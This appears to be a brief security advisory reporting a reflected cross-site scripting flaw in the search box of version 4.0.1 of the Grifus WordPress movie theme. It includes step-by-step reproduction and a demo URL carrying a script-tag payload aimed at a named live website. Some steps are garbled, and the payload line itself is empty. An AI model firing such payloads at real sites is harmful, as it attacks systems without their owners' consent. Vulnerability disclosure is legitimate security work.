====== Title: Grifus WordPress Themes XSS Vuln Version: 4.0.1 Homepage: https://mundothemes.com/grifus/ ======= Description ================ Grifus WordPress theme For movies Web POC: ======== 1. Go To Terget Web 2. Click Search box 3. Now Give This Payload in Search box " " 4. Now See xss Will be Exclude Demo: ====== http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document. domain%29%3C%2Fscript%3E Mitigations ================ Update Your Themes -- Thanks Sajibe Kanti Independent Web Security Researcher